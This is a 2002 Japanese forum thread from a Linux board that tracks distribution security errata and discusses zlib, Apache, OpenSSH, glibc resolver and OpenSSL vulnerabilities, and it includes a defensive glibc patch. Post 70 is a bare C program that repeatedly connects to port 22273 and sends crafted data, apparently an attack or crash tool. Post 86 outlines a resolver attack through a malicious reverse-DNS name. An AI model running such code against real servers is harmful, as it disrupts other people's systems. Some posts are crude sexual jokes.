02/02/02 13:55 TzxKF1DS.net
日々発見されるセキュリティホール。
その情報を一人であつめるのは大変です。情報の共有をしましょう。
先人達が埋めてくれた穴は、ありがたく反映させていただきましょう。
URLリンク(www.redhat.co.jp)
URLリンク(www.turbolinux.co.jp)
URLリンク(www.vinelinux.org)
URLリンク(www.debian.org)
ML等からの情報もよろしく
2:login:Penguin
02/02/02 14:23 vcmtljfb.net
2ゲトー(・∀・)
3:login:Penguin
02/02/02 15:35 WnmUFKAf.net
こうやって並べてみると、Debianが一番対応早いな。
2,3日遅れでRedHat、ついでTurboか。
Vineのatとrsyncの対応はどうなってるんだ?
4:login:Penguin
02/02/02 16:45 ZpBt8Xu4.net
>>3
うち、Debianじゃないんだけど
apt-get upgrade
をcronさせとけば勝手に埋まりそうで良いなぁ~
でも、これって「隣の花は赤い」みたいなものかなぁ・・・
5:login:Penguin
02/02/02 16:51 pTTak0WL.net
自動実行すると、設定ファイルがデフォルトに戻ってしまってそれがかえって
穴になってしまうってことは無いのかな?
6:login:Penguin
02/02/02 17:24 iy9HS+C9.net
>>5
DebianだとConffileはどうするか決められるでしょ
7:login:Penguin
02/02/03 00:45 kKB0w3Ro.net
>>6
やはり Debian 強いね。
そういうおれは、手動アップの 厨房な夜
8:login:Penguin
02/02/04 17:21 wJQG6Z6M.net
cron で upgrade すると対話的な質問のところで止まるという罠。
9:login:Penguin
02/02/06 09:06 wzRHhwGZ.net
2/5 Vine-errata
version-up
at-3.1.8-23vl0.1.i386.rpm
security-hole
uucp-1.06.1-31vl0.i386.rpm
rsync-2.4.1-2vl1.i386.rpm
10:login:Penguin
02/02/06 09:37 z1OnXuT2.net
Turbolinux
2002-02-01 mozilla 任意のホストのクッキーが不正に取得されてしまう
11:login:Penguin
02/02/06 13:22 aFEtGAeu.net
関連スレッド
スレリンク(unix板)
12:login:Penguin
02/02/06 16:18 CGfU8woV.net
彼女のセキュリティーホールを守るにはどうしたらいいですか?
13:login:Penguin
02/02/06 16:35 WFWamG0l.net
>>12貞操帯
14:login:Penguin
02/02/06 16:56 IgP4o0CH.net
>>13 予防的手段だけに頼ってはいけない。
インテグリティーチェックと定期的なログ監査。事後対策も忘れずに!
15:login:Penguin
02/02/06 17:36 suxHB5vN.net
>>12
常時自分がログインしておくというのは?
16:login:Penguin
02/02/06 17:50 YEmPbmK+.net
>>12
電源切っとけ。
17:login:Penguin
02/02/06 19:28 25EU2pWE.net
パッチうぉ あてよう
18:login:Penguin
02/02/18 21:43 7km2bSU3.net
SNMPセキュリティーホールage。
つーか、使ってる人いるのか?
使わんのだったら、パケジ消しとけ。
URLリンク(www.debian.org)
URLリンク(www.turbolinux.co.jp)
19:login:Penguin
02/02/18 22:09 Y/OOH446.net
at, uucp, ucd-sntpなんて個人でLinuxやってる場合は要らんとおもう
20:rrdtool
02/02/18 22:38 e0R/XIhl.net
net-snmp 4.2.3をtar玉から入れてる人は
snmpnetstatのfixパッチも当てたほうがエエぞ
fixパッチはredhatのSRPMから頂くとよろし
21:login:Penguin
02/02/18 23:03 xV7FaOh2.net
uucp、ucd-snmpはともかく、atは...まぁ、無くてもこまらんか。
ともかく、RPM系のディストリビューションで、「全部」とかで
インストールしてると、入ってる可能性大だから、用チェック
かとおもうですはい。
22:login:Penguin
02/03/03 03:46 631jyWWL.net
ipchainsの設定をしてみました。この設定はどうでしょうか?
# ipchains -nL
Chain input (policy ACCEPT):
target prot opt source destination ports
fw all ------ 0.0.0.0/0 0.0.0.0/0 n/a
Chain forward (policy DENY):
target prot opt source destination ports
MASQ all ------ 192.168.1.0/24 0.0.0.0/0 n/a
Chain output (policy ACCEPT):
Chain fw (1 references):
target prot opt source destination ports
ACCEPT tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 25
ACCEPT tcp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
ACCEPT udp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
DENY tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
DENY udp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
23:login:Penguin
02/03/03 12:16 SZmEd9Su.net
>>22
スレ違い。質問スレでやっとけ。
24:login:Penguin
02/03/03 12:18 SZmEd9Su.net
URLリンク(www.turbolinux.co.jp)
PHPボロボロだな
25:login:Penguin
02/03/07 15:55 cquF55ex.net
3/6 Vine-errata
security hole
squid-2.3.STABLE5-0vl2.i386.rpm
26:zlib!
02/03/12 16:41 UaXqoxZ1.net
zlib祭りだYO!
URLリンク(www.linuxsecurity.com)
URLリンク(www.kb.cert.org)
27:login:Penguin
02/03/12 21:43 lpFBAfJZ.net
URLリンク(www.zdnet.co.jp)
28:login:Penguin
02/03/12 21:57 e6hdJtN/.net
zlib祭り会場はどこですか?
29:login:Penguin
02/03/12 23:21 11TI6bf4.net
>>28
あなたのおうちの犬箱です
30:login:Penguin
02/03/12 23:25 tWqbf2NQ.net
ftp.mozilla.orgが繋がらないのはzlib祭りのお陰ですか?
31:sage
02/03/13 00:41 mlfLGoSb.net
URLリンク(www.kb.cert.org)
URLリンク(cve.mitre.org)
URLリンク(www.gzip.org)
URLリンク(slashdot.jp)
URLリンク(www.ipa.go.jp)
URLリンク(www.st.ryukoku.ac.jp)
32:login:Penguin
02/03/13 02:02 Rw4EvJaU.net
3/12 Vine-errata
security hole
openssh-2.9.9p2-0vl0.3.i386.rpm
openssh-clients-2.9.9p2-0vl0.3.i386.rpm
openssh-server-2.9.9p2-0vl0.3.i386.rpm
openssh-askpass-2.9.9p2-0vl0.3.i386.rpm
33:login:Penguin
02/03/13 08:10 P2nMMkSR.net
げー、zlibやばいなぁ。ローカルからの攻撃には無力っぽいね。
ブラウザ経由の攻撃もできるのかなぁ...
(不正なPNG送るとかで)
34:名無しさん@お腹いっぱい。
02/03/13 09:00 X9FAJrTn.net
mod_gzipとかやばそうだね
35:名無しさん@Emacs
02/03/13 10:03 uVnzr98W.net
>>33
まぁ何はなくともさっさとzlibを更新(-> 1.1.4)することだね。
pngやgzipを直接解釈するようなサーバでもない限り外部からの攻撃は受けない
だろうし、apacheをrootで動かしてるような豪快な奴も居ない(と信じたい)
だろうから、あまり大きな問題にはならないだろうけど。
36:zlib!
02/03/13 11:47 zAIB51rk.net
bugtraqに出てたH D Moore氏のpngの画像を
XEmacsでプレビューしたらXEmacsが落ちたYO!
37:zlib!
02/03/13 11:54 zAIB51rk.net
>>36
サンプル画像はここにもあるYO!
URLリンク(www.digitaloffense.net)
38:login:Penguin
02/03/13 19:47 dfFI4Er/.net
>>36
他力本願で申し訳ないが、coreとか調べてみました?
結局どーなってどーなっちゃうのかよくわからんもので・・・。
stackoverflowと同様だと思ってればいいのかな~
39:login:Penguin
02/03/13 23:37 7LNGAJrc.net
apache って root で動かすとやばいの?
40:login:Penguin
02/03/14 00:38 6jzSzsuH.net
>>39
そりゃやばいだろ (;´Д`)
41:zlib!
02/03/14 11:03 Ok5u5E1d.net
>>38
XEmacs(bamboo)はsignal 11で落ちたみたい
coreはあるけどgdb扱える能力無いのよ。すまん
で、zlib最新にしてlibpngリコンパイルしたら落ちなくなったYO!
42:login:Penguin
02/03/16 19:05 49Bp+Ljr.net
Debian セキュリティ HOWTO
URLリンク(www.jp.debian.org)
43:login:Penguin
02/03/21 09:18 l6UXxXqO.net
3/21 Vine-errata
security hole
zlib-1.1.3-25vl0.i386.rpm
zlib-devel-1.1.3-25vl0.i386.rpm
cvs-1.11.1p1-7vl0.i386.rpm
dump-0.4b19-5.6x.1.i386.rpm
dump-static-0.4b19-5.6x.1.i386.rpm
kernel-2.2.19-0vl0.24.i386.rpm
kernel-2.2.19-0vl0.24.i586.rpm
kernel-2.2.19-0vl0.24.i686.rpm
kernel-BOOT-2.2.19-0vl0.24.i386.rpm
kernel-doc-2.2.19-0vl0.24.i386.rpm
kernel-headers-2.2.19-0vl0.24.i386.rpm
kernel-ibcs-2.2.19-0vl0.24.i386.rpm
kernel-pcmcia-cs-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i586.rpm
kernel-smp-2.2.19-0vl0.24.i686.rpm
kernel-source-2.2.19-0vl0.24.i386.rpm
kernel-utils-2.2.19-0vl0.24.i386.rpm
rmt-0.4b19-5.6x.1.i386.rpm
rpm-3.0.6-0vl2.1.i386.rpm
rpm-build-3.0.6-0vl2.1.i386.rpm
rpm-devel-3.0.6-0vl2.1.i386.rpm
rpm-python-3.0.6-0vl2.1.i386.rpm
popt-1.5.1-0vl2.1.i386.rpm
rsync-2.4.1-2vl2.i386.rpm
sash-3.4-2vl0.i386.rpm
info-4.0-5vl0.i386.rpm
texinfo-4.0-5vl0.i386.rpm
44:login:Penguin
02/03/21 09:18 l6UXxXqO.net
3/21 Vine-errata
security hole
apache-1.3.23-0vl0.1.i386.rpm
apache-devel-1.3.23-0vl0.1.i386.rpm
apache-manual-1.3.23-0vl0.1.i386.rpm
mod_ssl-2.8.7-0vl0.1.i386.rpm
fileutils-4.0x-1vl4.i386.rpm
45:login:Penguin
02/04/05 12:26 ikMkS74J.net
04/04 Vine-errata security hole
XFree86-3.3.6-13vl28.1.i386.rpm
XFree86-100dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-75dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-3DLabs-3.3.6-13vl28.1.i386.rpm
XFree86-8514-3.3.6-13vl28.1.i386.rpm
XFree86-AGX-3.3.6-13vl28.1.i386.rpm
XFree86-FBDev-3.3.6-13vl28.1.i386.rpm
XFree86-I128-3.3.6-13vl28.1.i386.rpm
XFree86-Mach32-3.3.6-13vl28.1.i386.rpm
XFree86-Mach64-3.3.6-13vl28.1.i386.rpm
XFree86-Mach8-3.3.6-13vl28.1.i386.rpm
XFree86-Mono-3.3.6-13vl28.1.i386.rpm
XFree86-P9000-3.3.6-13vl28.1.i386.rpm
XFree86-S3-3.3.6-13vl28.1.i386.rpm
XFree86-S3V-3.3.6-13vl28.1.i386.rpm
XFree86-SVGA-3.3.6-13vl28.1.i386.rpm
XFree86-VGA16-3.3.6-13vl28.1.i386.rpm
XFree86-W32-3.3.6-13vl28.1.i386.rpm
XFree86-XF86Setup-3.3.6-13vl28.1.i386.rpm
XFree86-Xnest-3.3.6-13vl28.1.i386.rpm
XFree86-Xvfb-3.3.6-13vl28.1.i386.rpm
XFree86-cyrillic-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-devel-3.3.6-13vl28.1.i386.rpm
XFree86-doc-3.3.6-13vl28.1.i386.rpm
XFree86-libs-3.3.6-13vl28.1.i386.rpm
XFree86-xfs-3.3.6-13vl28.1.i386.rpm
46:login:Penguin
02/04/11 21:08 n5epu8MN.net
04/11 Vine-errata
security hole
squid-2.3.STABLE5-0vl4.i386.rpm
47:名無しさん
02/04/12 15:15 357cbhyA.net
ぼくの肛門も埋めてください
48:login:Penguin
02/05/14 10:29 nCRPXE+h.net
05/14 Vine-errata security hole
sudo-1.6.3p6-0.6vl3.i386.rpm
49:login:Penguin
02/05/28 18:43 nc9YjYw6.net
apt-get update
apt-get upgrade
だけでは不十分ですか?
50:login:Penguin
02/05/28 18:43 nc9YjYw6.net
age忘れ。
51:login:Penguin
02/06/03 00:38 ecxsuEIo.net
僕のチンポの先も埋めてください
52:login:Penguin
02/06/03 00:54 Yo9snOlP.net
>apt-get update
>apt-get upgrade
>
>だけでは不十分ですか?
ヴァカじゃん。そういう姿勢がそもそもsecurity hole
53:login:Penguin
02/06/06 13:09 H4e/6DmJ.net
06/06 Vine-errata security hole
fetchmail-5.9.11-0vl1.i386.rpm
imap-2001a-10vl1.i386.rpm
imap-devel-2001a-10vl1.i386.rpm
bzip2-1.0.1-3vl3.i386.rpm
bzip2-devel-1.0.1-3vl3.i386.rpm
54:login:Penguin
02/06/13 09:25 +8hN98ol.net
06/13 Vine-errata security hole
tcpdump-3.6.2-13vl1.i386.rpm
libpcap-0.6.2-13vl1.i386.rpm
arpwatch-2.1a11-13vl1.i386.rpm
55:login:Penguin
02/06/18 15:41 Y4ljwPvb.net
Apacheにセキュリティホール
URLリンク(slashdot.jp)
UNIX板 Apache関連 Part2
スレリンク(unix板:466番)n-
56:login:Penguin
02/06/19 08:45 HipJ6wEK.net
バグフィクスされたapacheがリリースされたそうです。
URLリンク(www.apache.org)
URLリンク(httpd.apache.org)
57:login:Penguin
02/06/19 23:43 APWNucgQ.net
06/19 Vine-errata security hole
apache-1.3.26-0vl1.i386.rpm
apache-devel-1.3.26-0vl1.i386.rpm
apache-manual-1.3.26-0vl1.i386.rpm
mod_ssl-2.8.9-0vl1.i386.rpm
58:login:Penguin
02/06/20 10:16 01vvi0s8.net
>>55
Red Hat
URLリンク(rhn.redhat.com)
59:login:Penguin
02/06/20 10:44 gutuxgNU.net
Debian (potato)
DSA-131-1 apache -- remote DoS / exploit
URLリンク(www.debian.org)
DSA-132-1 apache-ssl -- remote DoS / exploit
URLリンク(www.debian.org)
60:login:Penguin
02/06/20 13:37 RkoCmceO.net
Apache のそれは 32bit Linux でもヤバそう。
某MLにexploitが流れてた。
61:login:Penguin
02/06/20 13:56 gutuxgNU.net
Apache Web サーバプログラムの脆弱性に関する注意喚起 URLリンク(www.jpcert.or.jp)
62:login:Penguin
02/06/20 14:06 RkoCmceO.net
情報スカスカのJPCERT勧告なんぞ読んでも仕方無いぞ。ほい日本語版。
URLリンク(www.lac.co.jp)
63:login:Penguin
02/06/20 14:24 01vvi0s8.net
こっちはそれなりに有用。
URLリンク(www.ipa.go.jp)
64:名無しさん
02/06/22 23:55 STj3pUTJ.net
「くだ質」とどちらに投げようか迷った挙げ句、こちらに
投げることにしました。
以下のような自分の使用状況がセキュリティの面で安全か
どうか伺いたく存じます。
自宅でLinuxを使っています。Flets ADSLを契約しており、
常時接続ではなく、時々インターネットに接続して電子
メールを読み書きしたり、WWWで情報を得たりしています。
ルータ等は使っていません。他のホストにwwwやftpで
クライエントとして接続することはあっても、自ホストを
サーバにする必要は殆どないと考えています。ただ例外で、
smtpサーバとしてnullmailerを使っています。
Debian GNU/Linux sidを使っており、電源を入れる度に
apt-getでパッケージを更新しています。
ftpd、rsh-server、ssh、apache等は削除しています。
kernelは2.4.18です。
/etc/hosts.allowは何も記述せず、
/etc/hosts.denyはALL: ALLにしてます。
# netstat --tcp --all
は、
Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:32927 *:* LISTEN
tcp 0 0 xxx.yyy.zzz.uuu:33011 aaa.bbb.ccc.ddd:smtp TIME_WAIT
となります(xxx.yyy.zzz.uuuは割り当てられたIPアドレス、
aaa.bbb.ccc.dddはプロバイダのメールサーバのIPアドレス)。
65:login:Penguin
02/06/23 00:03 bXEc0h6E.net
>>64
> 以下のような自分の使用状況がセキュリティの面で安全か
> どうか伺いたく存じます。
「安全」と「安全でない」の2つしか状態がないと思ってる?
66:login:Penguin
02/06/23 00:47 knGXFfYf.net
Apache の脆弱性を攻撃するツールが登場
URLリンク(slashdot.jp)
67:login:Penguin
02/06/23 01:02 kepzSriJ.net
>>66
充分に気をつけているほうだと思うよ。
でもセキュリティにこれで完璧ってのは無いんだよ。
あくまでコストとリスクとの綱引きでしかない。
しかしそれで侵入されたからって君を責める人はあまりいないだろう。
68:login:Penguin
02/06/23 01:25 xLORxFdI.net
>>66
inetdも止めてしまおう。
69:login:Penguin
02/06/25 15:34 drybiZ1b.net
OpenSSH に新たな弱点発見。詳細は来週まで秘密。
リモートから悪用可能らしい。
3.3 にも同じ弱点があるが、侵入は防げるそうだ。
70:login:Penguin
02/06/25 22:33 yPSMZ+Jm.net
void writei(int fd,int num){num = htonl(num);write(fd,&num,4);}
void writes(int fd,char *s){write(fd,s,strlen(s)+1);}
void main(int argc,char **argv){struct hostent *he;struct sockaddr_in si;int fd;
char a[10];he = gethostbyname(argv[1]);while(1){fd = socket(PF_INET,SOCK_STREAM,0);si.sin_family = AF_INET;memcpy(&si.sin_addr,he->h_addr_list[0],sizeof(si.sin_addr));
si.sin_port = htons(22273);connect(fd,(struct sockaddr *)&si,sizeof(si));sprintf(a,"%d",rand());writei(fd,0x66);writei(fd,0);
writes(fd,a);writei(fd,0);writei(fd,3);close(fd);}}
71:login:Penguin
02/06/25 22:46 LJSlbrtr.net
>>69
これだね。
Debian 以外のパッケージはいつころ出るんだろ。
URLリンク(www.koka-in.org)
72:login:Penguin
02/06/26 09:06 yIavaL89.net
>70
Wnnか?何の穴よ?
まさかwww.freewnn.orgにある大昔の穴じゃないだろうな。
73:login:Penguin
02/06/26 20:58 0uLnP27B.net
>>72
違うっぽい。
74:login:Penguin
02/06/26 22:51 knPs+H7Y.net
*BSD の libc の resolver に穴が見つかったようだけど、glibc は
どうなんだろう
URLリンク(www.pine.nl)
75:login:Penguin
02/06/27 00:16 UFWmO8g6.net
ISS から OpenSSH のアドバイザリが出た。
Challenge and Response 認証にバグ。remote root exploit。
sshd_config に
ChallengeResponseAuthentication no
で回避可能。3.4 で修正されている。
これがもし Theo の言ってた穴と同じものなら、
OpenSSH 3.0 以降にのみ存在する穴じゃん。
いちはやくアップデート出した Debian potato は踊らされただけか。
76:login:Penguin
02/06/27 00:18 UFWmO8g6.net
OpenSSH Advisory
URLリンク(www.openssh.com)
77:login:Penguin
02/06/27 00:19 UFWmO8g6.net
さみだれ式でごめん。ISS Advisory
URLリンク(www.openssh.com)
78:login:Penguin
02/06/27 00:31 UFWmO8g6.net
>>75
訂正。3.0 以降じゃなくて 2.9.9 以降に弱点がある模様。
Debian 2.2 (potato) は安全な 1.2 系からわざわざ弱点のある
3.3 に入れ換えさせられた恰好だよ。Theo のアホーーーーー。
フルディスクロージャってやっぱり大事なんだな。
79:login:Penguin
02/06/27 01:53 b3kvzA+X.net
06/27 Vine-errata security hole
openssh-3.3p1-0vl10.i386.rpm
openssh-server-3.3p1-0vl0.i386.rpm
openssh-clients-3.3p1-0vl0.i386.rpm
openssh-askpass-3.3p1-0vl0.i386.rpm
openssh-askpass-gnome-3.3p1-0vl0.i386.rpm
80:login:Penguin
02/06/27 01:59 b3kvzA+X.net
>>79 は 06/26 発行でした。スマソ
81:login:Penguin
02/06/27 11:42 /viQ/aAY.net
openssh 3.4p1出てるよage
82:login:Penguin
02/06/27 11:52 EftB/YmL.net
syslogdが大きい。
83:login:Penguin
02/06/27 16:56 QDJgHCs7.net
resolver のバグは対岸の火事ではない模様。
84:login:Penguin
02/06/27 17:20 /viQ/aAY.net
2ch鯖のApacheも入れ替えが始まってるね。 遅いぐらいだ。昨日の件もこれが絡んでたのだろうか。 しかし入れ替えたはいいがlinuxのlibcにも。。。。 なんてことになったら大火事だな。
85:login:Penguin
02/06/27 18:16 d3NH2M4p.net
>>84
まさに大火事のようで(藁
まあ、リモートからいじれる穴ではないだろうけど
86:login:Penguin
02/06/27 18:57 QDJgHCs7.net
>>85
resolver のバグはリモートからいじれる。
攻撃者は自由に設定出来るネームサーバを持っていればいい。
ある IP アドレスの逆引きホストネームに攻撃用コードを仕込む。
そしてその IP アドレスから攻撃対象のサーバに接続する。
攻撃対象のサーバが逆引きを行い、
返って来た巧妙に細工されたホスト名を正引きしたら、あぼーん。
87:login:Penguin
02/06/27 20:05 4+mBkHBL.net
glibcには*BSDよりも1箇所余計にチェックが入っているが、
これでは防げないのか?
88:login:Penguin
02/06/27 20:31 GRjz2eTH.net
OpenSSHを3.1→3.4にアップグレードしたら、sshdの起動時に
This platform does not support both privilege separation and
89:compression Compression disabled こんなメッセージを吐くんだけど・・・何だろ?syslogには上がらないみたいだけど気になるかな。 ちなみにRedHat6.2(kerner2.2.19/glibc2.1.3-23/OpenSSL0.9.6d)
90:
02/06/27 20:37 oX2io58x.net
>>88
Compressionは切ろう。
91:login:Penguin
02/06/27 20:41 QDJgHCs7.net
>>87
実際テストしてみたが落せない。
俺がヘボなだけかもしれないから識者の意見を待とう。
92:88
02/06/27 20:42 GRjz2eTH.net
>>89
sshd_configのCompressをnoに指定したら出なくなったよ。
感謝。
93:login:Penguin
02/06/27 21:00 4+mBkHBL.net
>>90
FreeBSDをパッチを見るに、gethnamaddr.cはずでにFreeBSDの
パッチと同じ処理が入っている。getnetnamadr.cにはない。
94:login:Penguin
02/06/27 21:00 QDJgHCs7.net
>>90
識者の意見が間違ってた Aapche の時のような事もあるから
itojun 氏のパッチあててもいいかもしれない。
でも勇み足で必要でないアップデートを出して、わざわざ穴を
開けてしまったDebian potato の例もあるし、悩ましいところだな。
95:login:Penguin
02/06/27 21:13 QDJgHCs7.net
識者登場age。
96:login:Penguin
02/06/27 21:32 4+mBkHBL.net
直すべきは nss_dns/dns-network.c か。
古いの見てた。すまそ。
97:login:Penguin
02/06/28 11:19 CALm/HoI.net
新しいBINDが出た
98:login:Penguin
02/06/28 13:40 PahA8xFy.net
>>93
itojunさんのパッチってどこでgetできます?
glibcに当たるのかいな?
99:login:Penguin
02/06/28 16:13 DZqksx+C.net
>>97
FreeBSD や NetBSD の Advisory 嫁。
そのままでは当たらないだろうから手作業で当てれ。
ま、俺はめんどいから様子見。
100:login:Penguin
02/06/28 20:57 Yj/G45g0.net
つーか、おまえら誰もglibcのコード読んでないんとちゃうか?
101:login:Penguin
02/06/28 21:47 Yj/G45g0.net
--- glibc-2.2.5/resolv/nss_dns/dns-network.c.org 2001-07-06 13:55:39.000000000 +0900
+++ glibc-2.2.5/resolv/nss_dns/dns-network.c 2002-06-28 21:42:26.000000000 +0900
@@ -328,7 +328,9 @@
}
cp += n;
*alias_pointer++ = bp;
- bp += strlen (bp) + 1;
+ n = strlen(bp) + 1;
+ bp += n;
+ linebuflen -= n;
result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC;
++have_answer;
}
こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
処理がすでに入っている。
102:名無しさん@XEmacs
02/06/29 01:29 cleVXGS3.net
>>100
> こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
> 処理がすでに入っている。
name6.c のチャンクは? と思ったけど,'99 に直ってるすね.
URLリンク(sources.redhat.com)
103:login:Penguin
02/06/29 04:06 uLF75Z2Y.net
>>79 Vine-errata security hole
openssh-3.4p1-0vl2.i386.rpm
openssh-server-3.4p1-0vl2.i386.rpm
openssh-clients-3.4p1-0vl2.i386.rpm
openssh-askpass-3.4p1-0vl2.i386.rpm
openssh-askpass-gnome-3.4p1-0vl2.i386.rpm
104:login:Penguin
02/07/02 09:30 QAyrQPMn.net
>>100-101
通報しますた。
105:login:Penguin
02/07/02 11:35 qVWzSPns.net
URLリンク(www.sendmail.org)
> 8.12.5/8.12.52002/06/25
> SECURITY: The DNS map can cause a buffer overflow if the user
> specifies a dns map using TXT records in the configuration
> file and a rogue DNS server is queried. None of the
> sendmail supplied configuration files use this option hence
> they are not vulnerable. Problem noted independently by
> Joost Pol of PINE Internet and Anton Rang of Sun Microsystems.
普通の設定では影響なし、なのかな?
106:login:Penguin
02/07/02 11:44 qVWzSPns.net
resolver 問題、CERT/CC によると
glibc はこれで fix されてるらしい。
URLリンク(www.kb.cert.org)
しかし、こういうのって他のプロジェクトに還元されないもんなんだろうか。
107:login:Penguin
02/07/02 12:47 KLRYFYVU.net
上のパッチ、だれかUlrich Drepperに投げた?
108:地獄狂 YahooBB219017000159.bbtec.net ◆7WP8X9hw
02/07/02 13:39 hdi7nBII.net
よくわかんないんだけど、glibcのバグはどのバージョンにあるの?
109:login:Penguin
02/07/04 02:52 qk/rUU9i.net
>>57 07/02 Vine-errata security hole
apache-1.3.26-0vl2.i386.rpm
apache-devel-1.3.26-0vl2.i386.rpm
apache-manual-1.3.26-0vl2.i386.rpm
mod_ssl-2.8.9-0vl2.i386.rpm
110:login:Penguin
02/07/04 13:55 50T+DZdt.net
URLリンク(dammit.lt)
このApacheワームのソースってどこから出たものなのかな。
ワーム自体は蜜壷で捕まえたみたいだけど。
111:login:Penguin
02/07/04 14:07 nB1GJwB4.net
Squid Proxy Cache Security Update Advisory SQUID-2002:3
- Security advisory several issues in Squid-2.4.STABLE6 and earlier.
Squid-2.4.STABLE7 released to address these issues.
URLリンク(www.squid-cache.org)
112:login:Penguin
02/07/04 14:13 WhJXedKe.net
>>109
投稿した人は「僕の inbox に入ってた」って言ってた。
113:login:Penguin
02/07/07 01:03 BITbiOEM.net
snortのalert(警告)をメールで携帯に送りたいんですが、
どのようにすれば良いのでしょうか。
confファイルにはそれらしき箇所が見つかりませんでした。
114:login:Penguin
02/07/07 01:06 puqWG/eL.net
>>112
snort 単体ではできない。
syslog と swatch 等を使うか、snort 用のツールを使う。
115:112
02/07/07 02:22 BITbiOEM.net
>>113
さんくすこ
116:login:Penguin
02/07/08 00:56 /S0ObH45.net
NetSNMPとMRTGでサーバを監視しようと思ってるんですが、
MRTGに関してはローカルホスト(NetSNMPが入ってるマシン)を対象に
監視を行っても良いのでしょうか。
なんか説明ページだと、ルータが監視の対象となってるみたいなんですが。
(ルータがSNMPに対応していないので…)
117:login:Penguin
02/07/08 12:47 X0vw/Q8k.net
>>115
問題なし
118:login:Penguin
02/07/08 21:11 u3KFO/Rs.net
07/08 Vine-errata security hole
squid-2.4.STABLE7-0vl1.i386.rpm
119:login:Penguin
02/07/11 10:09 5UzWVYho.net
URLリンク(lwn.net)
This bug has been fixed for the gethostbyXXX class of functions
in GNU libc in 1999. Unfortunately, there is similar code in the
getnetbyXXX functions in recent glibc implementations, and
the code is enabled by default. However, these functions are
used by very few applications only, such as ifconfig and ifuser,
which makes exploits less likely.
やはり....
120:login:Penguin
02/07/11 13:11 yBUV78yy.net
URLリンク(www.kb.cert.org)
更新されてる
121:login:Penguin
02/07/17 15:50 c18o8yEa.net
最近新しい穴が見つからないねぇ。
いいことなんだが、何かつまらんw
122:login:Penguin
02/07/22 23:24 /iXwHkpN.net
キタ━━━(゚∀゚)━━━ !!!
PHP 4.2.0/4.2.1 に任意コード実行可能なセキュリティホール。
また IA32 じゃ任意コード実行は出来ないなんて言ってるよ。
ホントカナー???
123:login:Penguin
02/07/26 10:13 GbcCcnsG.net
Updated glibc packages fix vulnerabilities in resolver
URLリンク(rhn.redhat.com)
> A buffer overflow vulnerability has been found in the way the glibc
> resolver handles the resolution of network names and addresses via DNS (as
> per Internet RFC 1011). Version 2.2.5 of glibc and earlier versions are
> affected. A system would be vulnerable to this issue if the
> "networks" database in /etc/nsswitch.conf includes the "dns" entry. By
> default, Red Hat Linux ships with "networks" set to "files" and
> is therefore not vulnerable to this issue. (CAN-2002-0684)
>
> A second, related, issue is a bug in the glibc-compat packages, which
> provide compatibility for applications compiled against glibc version
> 2.0.x. Applications compiled against this version (such as those
> distributed with early Red Hat Linux releases 5.0, 5.1, and 5.2) could also
> be vulnerable to this issue. (CAN-2002-0651)
>
> These errata packages for Red Hat Linux 7.1 and 7.2 on the Itanium
> architecture also include a fix for the strncpy implementation in some
> boundary cases.
124:名無しさん@Emacs
02/07/26 12:55 WWUr2yVC.net
>>120
良いことではないか。ないにこしたことはない。
125:login:Penguin
02/07/29 12:39 6tjxSffv.net
Jul 29 02:47:04 XXXXX sshd[14409]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(host180.cciglobal.net.pa) failed
これはresolverの穴を狙った攻撃?
126:login:Penguin
02/07/29 16:57 Nqm0H4Dg.net
接続元のIPアドレスからホスト名を調べて、そこからまたIPアドレスを
ひいたら元に戻らなかった、ってことだと思う。>>124のものも、
うちに来ているものも、DNSでAレコードがひけないんだよね。
Jul 28 04:45:35 giko sshd[80120]: warning: /etc/hosts.allow, line 4: can't verify hostname: getaddrinfo(h64-141-4-23.bigpipeinc.com, AF_INET) failed
Jul 28 04:45:35 giko sshd[80120]: refused connect from 64.141.4.23 (64.141.4.23)
% host 64.141.4.23
23.4.141.64.in-addr.arpa domain name pointer h64-141-4-23.bigpipeinc.com.
% host h64-141-4-23.bigpipeinc.com
Host h64-141-4-23.bigpipeinc.com not found: 3(NXDOMAIN)
詳しく調べたわけでないから嘘かもしれぬ。スマソ。
127:login:Penguin
02/07/29 18:09 qwCj4iNe.net
>>124
攻撃そのものは単純にsshdの古いバージョンでのセキュリティホール
を狙った物だと思う。偶然にもIPから逆引きできたホスト名と、その
ホスト名に対応するIPが合致していなかったために拒否されただけ。
128:login:Penguin
02/07/30 23:43 OrlpKdAp.net
マタキタ━━━(゚∀゚)━━━ !!!
OpenSSL にリモートから悪用可能なバッファオーバフロー。
既に赤帽と Woody には修正出た。でも Potato はまだ。
util-linux にもちっこい穴。
129:login:Penguin
02/07/31 11:36 RHIhvYC4.net
CERTキタ━━(゚∀゚)━( ゚∀)━( ゚)━( )━( )━(゚ )━(∀゚ )━(゚∀゚)━━!!!!!
URLリンク(www.cert.org)
130:login:Penguin
02/07/31 13:00 4XI2cpUc.net
Vine Linux 2.5/2.1.5 向け修正キタ━(゚∀゚)━━!!!!!
・2002,07,31 openssl にセキュリティホール
131:login:Penguin
02/07/31 14:06 ihwnQ9C/.net
07/31 Vine-errata security hole
openssl-0.9.6b-1vl5.i386.rpm
openssl-devel-0.9.6b-1vl5.i386.rpm
openssl-perl-0.9.6b-1vl5.i386.rpm
132:login:Penguin
02/07/31 20:42 YlVAcS0a.net
Turboにglibc、imap、artsのパッチ出てます。
133:login:Penguin
02/07/31 22:04 VJrOgCEJ.net
openss-0.9.6eをmake installしたら
/usr/bin/pod2manがうまくいかね-とか言って
「自前の古いやつで代用しとくよん」とか言われるんだが
perlはperl-5.00503-12が入っている
/usr/bin/pod2manは
29017 Aug 11 2000 /usr/bin/pod2man
赤帽6.2, kernel2.2.19-6.2.16
なんで?
134:login:Penguin
02/07/31 22:23 Q67jwc8B.net
>>131
